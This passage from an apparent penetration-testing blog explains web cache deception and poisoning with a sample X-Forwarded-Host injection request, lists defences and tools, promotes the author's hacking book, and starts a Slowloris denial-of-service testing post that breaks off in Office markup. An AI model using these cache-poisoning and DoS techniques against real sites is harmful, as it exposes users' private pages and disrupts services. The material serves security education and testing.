<tr style="box-sizing: border-box;"><td colspan="1" rowspan="1" style="box-sizing: border-box; padding: 0.5rem;"><span style="box-sizing: border-box; color: black; font-family: "arial"; font-size: 14.6667px;">fwd Path</span></td><td colspan="1" rowspan="1" style="box-sizing: border-box; padding: 0.5rem;"><span style="box-sizing: border-box; color: black; font-family: "arial"; font-size: 14.6667px;"><a href="http://edgegatecpinotossi.appspot.com/products.jsp" rel="noopener" style="background-color: transparent; box-sizing: border-box; color: #049cd4; cursor: pointer; text-decoration-line: none; transition: color 0.1s linear 0s;" target="_blank">edgegatecpinotossi.appspot.com/products.jsp</a></span></td></tr>
<tr style="box-sizing: border-box;"><td colspan="1" rowspan="1" style="box-sizing: border-box; padding: 0.5rem;"><span style="box-sizing: border-box; color: black; font-family: "arial"; font-size: 14.6667px;">Query String</span></td><td colspan="1" rowspan="1" style="box-sizing: border-box; padding: 0.5rem;"><span style="box-sizing: border-box; color: black; font-family: "arial"; font-size: 14.6667px;">?productId=1</span></td></tr>
</tbody></table>
</div>
<div style="text-align: justify;">
<b><br /></b>
<b>Before the attack: Reconnaissance</b><br />
<b><br /></b>
Before progressing with any type of cache manipulation it does worth the trouble to review the route path the targeted web server. Running a query on Robtext on google.com will give us a lot of information that can be used to see if a cache proxy is used.<br />
<br />
Below you can see en extract of the output in Robtext (https://www.robtex.com/dns-lookup/google.com#owhois):<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhldy7fvuz7EAA3erROc1SxBdNnGFyhXc7Cpo2hIe7QkCP68jDX5XFXm3tc3r7Qlrx6mh0MjORJTBVWHRpQsp8HsILObUQ8nbhMW8ECogN2VE4eFbHxOA-eXbmuveZVORgKucTiKI8xrHA/s1600/Graph.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="453" data-original-width="742" height="390" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhldy7fvuz7EAA3erROc1SxBdNnGFyhXc7Cpo2hIe7QkCP68jDX5XFXm3tc3r7Qlrx6mh0MjORJTBVWHRpQsp8HsILObUQ8nbhMW8ECogN2VE4eFbHxOA-eXbmuveZVORgKucTiKI8xrHA/s640/Graph.png" width="640" /></a></div>
<br />
<b><br /></b></div>
<div style="text-align: justify;">
<b>Note:</b> Using also other manual tools to see if there is a cache proxy in front of the webservice.<br />
<br />
<b><br /></b>
<b>Finally the attack: Web Cache deception</b></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Web cache deception occurs when the target website is configured to be "flexible" about what kinds of paths it can handle (aka. URL(s)). For more information on what a URL is see <a href="https://www.rfc-editor.org/info/rfc1738">https://www.rfc-editor.org/info/rfc1738</a> . This make sense from usability perspective e.g. by the product being tolerant on certain types of inputs becomes more user friendly. Also this has to do how each software vendor interprets the RFC related to the URL structure.<br />
<br />
In particular, the issue arises when requests to a path that doesn't exist (say /x/y/z) are treated as equivalent to requests to a parent path that does exist (say /x). For example, what happens if you get a request for the nonexistent path /newsfeed/foo? Depending on how your website is configured, it might just treat such a request as equivalent to a request to /newsfeed. For example, if you're running the Django web framework, the following configuration would do just that because the regular expression ^newsfeed/ matches both newsfeed/ and newsfeed/foo (Django routes omit the leading /): [14]</div>
<div style="text-align: justify;">
<b><br /></b></div>
<div style="text-align: justify;">
<blockquote class="tr_bq">
<i>from django.conf.urls import url</i><i><br /></i><i>patterns = [url(r'^newsfeed/', ...)]</i></blockquote>
</div>
<div style="text-align: justify;">
And here's where the problem lies. If your website does this, then a request to /newsfeed/foo.jpg will be treated as the same as a request to /newsfeed. But a web cache, seeing the .jpg file extension, will think that it's OK to cache this request. Because usually most of the web caches proxies by default store image file extensions. [14]<br />
<br />
Below we can see a schematic analysis of the issue:<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizeF0JDAxTXxoRoeL-nEsO6jIFkZ0pbEWPgjBNJJDv9iE1L1gzY86oOF2YZEEZlZknCk-om4G9BkRX4TB8RsH9G5bpE4yN-hPo7CRST5pKjcoLtl7egrYBUuiQZLRi9hSDOSgrrk7SxBE/s1600/URL.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="392" data-original-width="548" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizeF0JDAxTXxoRoeL-nEsO6jIFkZ0pbEWPgjBNJJDv9iE1L1gzY86oOF2YZEEZlZknCk-om4G9BkRX4TB8RsH9G5bpE4yN-hPo7CRST5pKjcoLtl7egrYBUuiQZLRi9hSDOSgrrk7SxBE/s1600/URL.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<b>Note:</b> In the following diagram above we can see the how a malicious user can request the home page of the user. At this point is assumed that the home page contains sensitive information and requires some kind of login. In this example is also assumed that the cache server stores local copies of the site images.<br />
<br />
It does also worth saying that this is a simplified, and that is someone would like to perform a more complicated attack would have to:<br />
<ul>
<li>Understand the scope of the cache server e.g. region cache server.</li>
<li>Understand the cache rules of the cache server e.g. Akamai ARL etc.</li>
<li>Identify target content of interest e.g. sensitive content etc. </li>
</ul>
</div>
<div style="text-align: justify;">
<b>Note:</b> It does also worth mentioning that identifying how both the web and cache server "understand" the URL structure is also important e.g. experimenting with malicious paths, such as mangled back slashes etc. This also relates to what is considered acceptable also from the browsers.<br />
<b><br /></b>
<b><br /></b>
<b>Finally the attack: Web Cache poisoning </b><br />
<b><br /></b>
The objective of web cache poisoning is to send a request that causes a harmful response that gets saved in the cache and served to other users. The following diagram shows the process to follow:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfuCfyZnhHjpQxL3KRBpJ4VOQoxmH23krl0cwNIFBWm4JPZC3LP2j_uufivVd7lslArZRhkkuKX-auJufJ4wE1v5Jhjp01MzayDEQp17-UmQ6ONYOgNr9tQeJaBpu4wB9yx9V25bebtA0/s1600/poison.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="379" data-original-width="633" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfuCfyZnhHjpQxL3KRBpJ4VOQoxmH23krl0cwNIFBWm4JPZC3LP2j_uufivVd7lslArZRhkkuKX-auJufJ4wE1v5Jhjp01MzayDEQp17-UmQ6ONYOgNr9tQeJaBpu4wB9yx9V25bebtA0/s1600/poison.png" /></a></div>
James Kettle (aka. @albinowax) has done an amazing job documenting the vulnerability and wrote about multiple scenarios and ways to exploit the specific vulnerability. More specifically described the following scenarios:<br />
<ul>
<li>Selective Poisoning</li>
<li>DOM Poisoning</li>
<li>Hijacking Mozilla SHIELD</li>
<li>Route poisoning</li>
<li>Hidden Route Poisoning</li>
<li>Chaining Unkeyed Inputs</li>
<li>Open Graph Hijacking</li>
<li>Local Route Poisoning</li>
<li>Internal Cache Poisoning</li>
<li>Drupal Open Redirect</li>
<li>Persistent redirect hijacking</li>
<li>Nested cache poisoning</li>
<li>Cross-Cloud Poisoning</li>
</ul>
A simplified version of an attack scenario would be to:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdrjo2VdndRk9eZNSGrW61uQPbgJj47oORBrFZxb5Gs3FA-m5rWrIqHbY_-RFcHmIimlncmtUq7tnj2fv2TkhO-gmeCsQLlpJQOIHxGVGUZ6U1VX0Mg7d-16jJuR-on50jBhSfNcKiYvA/s1600/poison1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="423" data-original-width="695" height="389" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdrjo2VdndRk9eZNSGrW61uQPbgJj47oORBrFZxb5Gs3FA-m5rWrIqHbY_-RFcHmIimlncmtUq7tnj2fv2TkhO-gmeCsQLlpJQOIHxGVGUZ6U1VX0Mg7d-16jJuR-on50jBhSfNcKiYvA/s640/poison1.png" width="640" /></a></div>
a simple example of Web Cache poisoning would that assuming that the cache key is the X-Forwarded-Host HTTP header. we can Inject our own variable and then echoed it back in a cache level.<br />
<br />
This is taken from https://portswigger.net/blog/practical-web-cache-poisoning :<br />
<br />
<b>Request:</b><br />
<br />
<div style="text-align: left;">
<i>GET /en?cb=1 HTTP/1.1</i></div>
<div style="text-align: left;">
<i>Host: www.redhat.com</i></div>
<div style="text-align: left;">
<i><span style="color: red;">X-Forwarded-Host: canary</span></i></div>
<b><br /></b>
<b>Response:</b><br />
<b><br /></b>
<i>GET /en?cb=1 HTTP/1.1</i><br />
<i>Host: www.redhat.com</i><br />
<i>X-Forwarded-Host: canary</i><br />
<i><br /></i>
<i>HTTP/1.1 200 OK</i><br />
<i>Cache-Control: public, no-cache</i><br />
<i>…</i><br />
<br />
<i><meta property="og:image"<span style="color: red;"> content="https://canary/cms/social.png" /></span></i><br />
<b><br /></b>
In the example above we saw that the cache key was echoed back in the html body. The X-Forwarded-Host header has been used by the application to generate an Open Graph URL inside a meta tag. In this scenario we can assume that this can be converted into an XSS, HTML or other type of client side injection attack.<br />
<b><br /></b>
<b>Defending against Web Cache attacks</b></div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The best way to defend against this attack is to ensure that your website isn't so permissive, and never treats requests to nonexistent paths. Also that:</div>
<div style="text-align: justify;">
<ul>
<li><b>Use the same URL to refer to the same items</b>: Since caches key off of both the host and the path to the content requested, ensure that you refer to your content in the same way on all of your pages. The previous recommendation makes this significantly easier. [6]</li>
<li><b>Fingerprint cache items:</b> For static content like CSS and Javascript files, it may be appropriate to fingerprint each item (per user session). This means adding a unique identifier to the filename (often a hash of the file) so that if the resource is modified, the new resource name can be requested, causing the requests to correctly bypass the cache. [6]</li>
<li><b>Write your custom cache rules:</b> A web cache server has to be aware of the application content and nature e.g. not caching dynamic content on banking application etc. </li>
<li><b>Avoid taking input from headers and cookie: </b>Simply filter HTTP headers and cookies by running integrity checks.</li>
<li><b>Disable cache if not required:</b> Lots of services don't require caching, but because is enabled by default the allow it.</li>
</ul>
</div>
<div style="text-align: justify;">
<b>Tools for cache poisoning/deception </b></div>
<div style="text-align: justify;">
<b><br /></b></div>
<div style="text-align: justify;">
The following section demonstrates tools that can be used to manipulate cache poisoning: </div>
<div style="text-align: justify;">
<ul>
<li><b>param-miner:</b> This extension identifies hidden, unlinked parameters. It's particularly useful for finding web cache poisoning vulnerabilities.[3]</li>
<li><b>Burp Suite Free/Pro: </b>Intruder component [16]</li>
</ul>
</div>
<div style="text-align: justify;">
<b>References:</b></div>
<div style="text-align: justify;">
<b><br /></b></div>
<div>
<ul>
<li style="text-align: justify;"><a href="https://en.wikipedia.org/wiki/Cache_(computing)">https://en.wikipedia.org/wiki/Cache_(computing)</a> [1]</li>
<li style="text-align: justify;"><a href="https://portswigger.net/blog/practical-web-cache-poisoning">https://portswigger.net/blog/practical-web-cache-poisoning</a> [2]</li>
<li style="text-align: justify;"><a href="https://github.com/PortSwigger/param-miner">https://github.com/PortSwigger/param-miner</a> [3]</li>
<li style="text-align: justify;"><a href="https://www.reddit.com/r/netsec/comments/9668sd/practical_web_cache_poisoning/">https://www.reddit.com/r/netsec/comments/9668sd/practical_web_cache_poisoning/</a> [4]</li>
<li style="text-align: justify;"><a href="https://blog.cloudflare.com/understanding-our-cache-and-the-web-cache-deception-attack/">https://blog.cloudflare.com/understanding-our-cache-and-the-web-cache-deception-attack/</a> [5]</li>
<li style="text-align: justify;"><a href="https://www.digitalocean.com/community/tutorials/web-caching-basics-terminology-http-headers-and-caching-strategies">https://www.digitalocean.com/community/tutorials/web-caching-basics-terminology-http-headers-and-caching-strategies</a> [6]</li>
<li style="text-align: justify;"><a href="https://support.cloudflare.com/hc/en-us/articles/202775670-How-Do-I-Tell-Cloudflare-What-to-Cache-">https://support.cloudflare.com/hc/en-us/articles/202775670-How-Do-I-Tell-Cloudflare-What-to-Cache-</a> [7]</li>
<li style="text-align: justify;"><a href="https://www.smashingmagazine.com/2017/11/understanding-vary-header/">https://www.smashingmagazine.com/2017/11/understanding-vary-header/</a> [8]</li>
<li style="text-align: justify;"><a href="https://tools.ietf.org/html/rfc8246#page-4">https://tools.ietf.org/html/rfc8246#page-4</a> [9]</li>
<li style="text-align: justify;"><a href="https://tools.ietf.org/html/rfc5861">https://tools.ietf.org/html/rfc5861</a> [10]</li>
<li style="text-align: justify;"><a href="https://community.akamai.com/customers/s/article/Cache-Keys-Why-we-should-know-them?language=en_US">https://community.akamai.com/customers/s/article/Cache-Keys-Why-we-should-know-them?language=en_US</a> [11]</li>
<li style="text-align: justify;"><a href="https://developer.akamai.com/legacy/learn/Overview/Client_Edge_Servers_Origin.html">https://developer.akamai.com/legacy/learn/Overview/Client_Edge_Servers_Origin.html</a> [12]</li>
<li style="text-align: justify;"><a href="https://learn.akamai.com/en-us/webhelp/pulsar-diagnostic-tools/pulsar-diagnostic-tools/GUID-54157798-C972-44C3-9B45-8E09A93A37F0.html">https://learn.akamai.com/en-us/webhelp/pulsar-diagnostic-tools/pulsar-diagnostic-tools/GUID-54157798-C972-44C3-9B45-8E09A93A37F0.html</a> [13]</li>
<li style="text-align: justify;"><a href="https://blog.cloudflare.com/understanding-our-cache-and-the-web-cache-deception-attack/">https://blog.cloudflare.com/understanding-our-cache-and-the-web-cache-deception-attack/</a> [14]</li>
<li style="text-align: justify;"><a href="https://omergil.blogspot.com/2017/02/web-cache-deception-attack.html">https://omergil.blogspot.com/2017/02/web-cache-deception-attack.html</a> [15]</li>
<li style="text-align: justify;"><a href="https://portswigger.net/burp">https://portswigger.net/burp</a> [16]</li>
<li style="text-align: justify;"><a href="https://support.cloudflare.com/hc/en-us/articles/360023040812-Best-Practice-Caching-Everything-While-Ignoring-Query-Strings">https://support.cloudflare.com/hc/en-us/articles/360023040812-Best-Practice-Caching-Everything-While-Ignoring-Query-Strings</a> [17]</li>
</ul>
</div>
<div style="text-align: justify;">
<br /></div>
<div class="blogger-post-footer">Penetest Horror Blog</div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-7947080244954191821.post-61866149892617688932016-05-28T14:27:00.000-07:002016-05-28T15:47:33.794-07:00Hacker’s Elusive Thoughts The Web<div style="text-align: justify;">
</div>
<div class="page" style="text-align: justify;" title="Page 2">
<h2>
Introduction</h2>
</div>
<div class="page" style="text-align: justify;" title="Page 2">
</div>
<div class="page" style="text-align: justify;" title="Page 2">
<span style="font-family: "arial" , "helvetica" , sans-serif;">The reason for this blog post is to advertise my book. First of all I would like to thank all the readers of my blog for the support and feedback on making my articles better. After 12+ years in the penetration testing industry, the time has come for me to publish my book and tranfer my knowledge to all the intersted people that like hacking and want to learn as much as possible. Also at the end of the blog you will find a sample chapter. </span><br />
<div class="layoutArea" style="text-align: justify;">
<br />
<div class="separator" style="clear: both; text-align: center;">
<span style="font-family: "lmroman12"; font-size: 17.000000pt; font-weight: 700;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYJdzuSZxHjjkLepbWq_XlekWCiivUxmzZe97WHxMEczHnkKniJdIBt0FIH9uyKjln-aJRRwIw_aMpHnS6JiAuXTZU5l0BQCF9_uX_NTfASIrMICWzdQLH2Wjd2iECPw4p8BFHRY0fYQs/s1600/jerry_book.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYJdzuSZxHjjkLepbWq_XlekWCiivUxmzZe97WHxMEczHnkKniJdIBt0FIH9uyKjln-aJRRwIw_aMpHnS6JiAuXTZU5l0BQCF9_uX_NTfASIrMICWzdQLH2Wjd2iECPw4p8BFHRY0fYQs/s320/jerry_book.png" width="224" /></a></span></div>
<span style="font-family: "lmroman12"; font-size: 17.000000pt; font-weight: 700;">
</span></div>
<div class="layoutArea" style="text-align: justify;">
</div>
<br />
<br />
<h2>
About The Author</h2>
Gerasimos is a security consultant holding a MSc in Information Security, a CREST (CRT), a CISSP, an ITILv3, a GIAC GPEN and a GIAC GAWPT accreditation. Working alongside diverse and highly skilled teams Gerasi- mos has been involved in countless comprehensive security tests and web application secure development engagements for global web applications and network platforms, counting more than 14 years in the web application and application security architecture.<br />
<br />
Gerasimos further progressing in his career has participated in vari- ous projects providing leadership and accountability for assigned IT security projects, security assurance activities, technical security reviews and assess- ments and conducted validations and technical security testing against pre- production systems as part of overall validations.<br />
<br />
<h2>
Where From You Can Buy The Book </h2>
<div style="text-align: justify;">
This book can be bought from leanbup. Leanpub is a unique publishing platform that provides a way in the world to write, publish and sell in-progress and completed ebooks. Anyone can sign up for free and use Leanpub's writing and publishing tools to produce a book and put it up for sale in our bookstore with one click. Authors are paid a royalty of 90% minus 50 cents per transaction with no constraints: they own their work and can sell it elsewhere for any price.<br />
<br />
Authors and publishers can also upload books they have created using their own preferred book production processes and then sell them in the Leanpub bookstore, taking advantage of our high royalty rates and our in-progress publishing features. </div>
<br />
<div style="text-align: left;">
Please for more information about bying the book see link: <a href="https://leanpub.com/hackerselusivethoughtstheweb">https://leanpub.com/hackerselusivethoughtstheweb</a></div>
<br />
<h2>
Why I Wrote This Book </h2>
I wrote this book to share my knowledge with anyone that wants to learn about Web Application security, understand how to formalize a Web Appli- cation penetration test and build a Web Application penetration test team. <br />
<br />
<u>The main goal of the book is to: </u></div>
<div class="page" style="text-align: justify;" title="Page 2">
<br />
Brainstorm you with some interesting ideas and help you build a com- prehensive penetration testing framework, which you can easily use for your specific needs. Help you understand why you need to write your own tools. Gain a better understanding of some not so well documented attack techniques. </div>
<div class="page" style="text-align: justify;" title="Page 2">
<u>The main goal of the book is not to:</u></div>
<div class="page" style="text-align: justify;" title="Page 2">
<u> </u> <br />
Provide you with a tool kit to perform Web Application penetration tests. Provide you with complex attacks that you will not be able to under- stand. Provide you with up to date information on latest attacks.</div>
<div class="page" style="text-align: justify;" title="Page 2">
<h2>
Who This Book Is For </h2>
</div>
<div class="page" style="text-align: justify;" title="Page 2">
<br />
This book is written to help hacking enthusiasts to become better and stan- dardize their hacking methodologies and techniques so as to know clearly what to do and why when testing Web Applications. This book will also be very helpful to the following professionals: <br />
<br />
1. Web Application developers.<br />
2. Professional Penetration Testers.<br />
3. Web Application Security Analysts.<br />
4. Information Security professionals.<br />
5. Hiring Application Security Managers.<br />
6. Managing Information Security Consultants.</div>
<div class="page" style="text-align: justify;" title="Page 2">
</div>
<div class="page" style="text-align: justify;" title="Page 2">
<h2>
How This Book Is Organised </h2>
</div>
<div class="page" style="text-align: justify;" title="Page 2">
Almost all chapters are written in such a way so as to not require you to read the chapters sequentially, in order to understand the concepts presented, although it is recommended to do so. The following section is going to give you an overview of the book: <br />
<br />
<b>Chapter 1:</b> Formalising Web Application Penetration Tests -</div>
<div class="page" style="text-align: justify;" title="Page 2">
This chapter is a gentle introduction to the world of penetration testing, and attempt to give a realistic view on the current landscape. More specifically it attempt to provide you information on how to compose a Pen- etration Testing team and make the team as ecient as possible and why writing tools and choosing the proper tools is important.<br />
<br /></div>
<div class="page" style="text-align: justify;" title="Page 2">
<b>Chapter 2: </b>Scanning With Class - </div>
<div class="page" style="text-align: justify;" title="Page 2">
<br />
The second chapter focuses on helping you understand the dierence between automated and manual scanning from the tester’s perspective. It will show you how to write custom scanning tools with the use of Python. This part of the book also contains Python chunks of code demonstrating on how to write tools and design your own scanner. </div>
<div class="page" style="text-align: justify;" title="Page 2">
<br />
<b>Chapter 3:</b> Payload Management - </div>
<div class="page" style="text-align: justify;" title="Page 2">
<br />
This chapter focuses on explaining two things a) What is a Web payload from security perspective, b) Why is it important to obfuscated your payloads. </div>
<div class="page" style="text-align: justify;" title="Page 2">
<br />
<b>Chapter 4:</b> Infiltrating Corporate Networks Using XXE - </div>
<div class="page" style="text-align: justify;" title="Page 2">
<br />
This chapter focuses on explaining how to exploit and elevate an External Entity (XXE) Injection vulnerability. The main purpose of this chapter is not to show you how to exploit an XXE vulnerability, but to broaden your mind on how you can combine multiple vulnerabilities together to infiltrate your target using an XXE vulnerability as an example. </div>
<div class="page" style="text-align: justify;" title="Page 2">
<br />
<b>Chapter 5:</b> Phishing Like A Boss -</div>
<div class="page" style="text-align: justify;" title="Page 2">
<br />
This chapter focuses on explaining how to perform phishing attacks using social engineering and Web vulnerabilities. The main purpose of this chapter is to help you broaden your mind on how to combine multiple security issues, to perform phishing attacks. </div>
<div class="page" style="text-align: justify;" title="Page 2">
<br />
<b>Chapter 6:</b> SQL Injection Fuzzing For Fun And Profit - </div>
<div class="page" style="text-align: justify;" title="Page 2">
<br />
This chapter focuses on explaining how to perform and automate SQL injection attacks through obfuscation using Python. It also explains why SQL injection attacks happen and what is the risk of having them in your web applications. <br />
<br />
<br />
<span style="color: red;">Sample Chapter Download </span></div>
<div class="page" style="text-align: justify;" title="Page 2">
From the following link you will be able to download a sample chapter from my book:<br />
<br />
<a href="https://www.dropbox.com/sh/r24hffyg6pkzo2k/AACw024Jqd6jZ5FtziqxnFEDa?dl=0">Sample Book Download</a><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br /></div>
<div class="blogger-post-footer">Penetest Horror Blog</div>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-7947080244954191821.post-15314405668419867392015-03-05T09:21:00.001-08:002015-03-05T09:22:00.851-08:00Symetric Denial of Service Testing - Aka 1 on 1 <b>Intro</b><br />
<br />
This post is going to explain how to test a Denial of Service Vulnerability without crashing the actual service. More specifically we will focus on two vulnerabilities a) the slowris vulnerability (also known as Apache Partial HTTP Request Denial of Service Vulnerability) and b) the TLS Renegotiation and Denial of Service Attacks.<br />
<br />
<b>Apache Partial HTTP Request Denial of Service Vulnerability</b><br />
<br />
The target application Apache Server is vulnerable to a denial of service named Slow-DoS attack, due to holding a connection open for partial HTTP requests. Both Apache Versions 1.x and 2.x are vulnerable. Slow HTTP attacks are denial-of-service (DoS) attacks in which the attacker sends HTTP requests in pieces slowly, one at a time to a Web server. If an HTTP request is not complete, or if the transfer rate is very low, the server keeps its resources busy waiting for the rest of the data. When the server’s concurrent connection pool reaches its maximum, this creates a DoS. Slow HTTP attacks are easy to execute because they require only minimal resources from the attacker.<br />
<br />
<b>Business Impact</b><br />
<br />
A remote attacker can cause a denial of service against the Web server which would prevent legitimate users from accessing the site.<br />
<br />
<b>Remediation</b><br />
<br />
There are no vendor-supplied patches available at this time. Upgrade to the latest version.<br />
<br />
<b>Example</b><br />
<br />
<u>Slowloris tool output:</u><br />
<br />
<!--[if gte mso 9]><xml>
<o:OfficeDocumentSettings>
<o:AllowPNG/>
</o:OfficeDocumentSettings>
</xml><![endif]--><br />
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>EN-GB</w:LidThemeOther>
<w:LidThemeAsian>X-NONE</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:EnableOpenTypeKerning/>
<w:DontFlipMirrorIndents/>
<w:OverrideTableStyleHps/>
</w:Compatibility>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="false"
DefSemiHidden="false" DefQFormat="false" DefPriority="99"
LatentStyleCount="371">
<w:LsdException Locked="false" Priority="0" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 1"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 5"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 6"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 7"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 8"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index 9"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" SemiHidden="true"
UnhideWhenUsed="true" Name="toc 9"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="Normal Indent"/>
<w:LsdException Locked="false" Priority="0" SemiHidden="true"
UnhideWhenUsed="true" Name="footnote text"/>
<w:LsdException Locked="false" Priority="0" SemiHidden="true"
UnhideWhenUsed="true" Name="annotation text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="header"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footer"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="index heading"/>
<w:LsdException Locked="false" Priority="35" SemiHidden="true"
UnhideWhenUsed="true" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="table of figures"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="envelope address"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="envelope return"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="footnote reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="annotation reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="line number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="page number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="endnote reference"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="endnote text"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="table of authorities"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="macro"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="toa heading"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Bullet"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List Number"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 2"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 3"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 4"/>
<w:LsdException Locked="false" SemiHidden="true" UnhideWhenUsed="true"
Name="List 5"/>
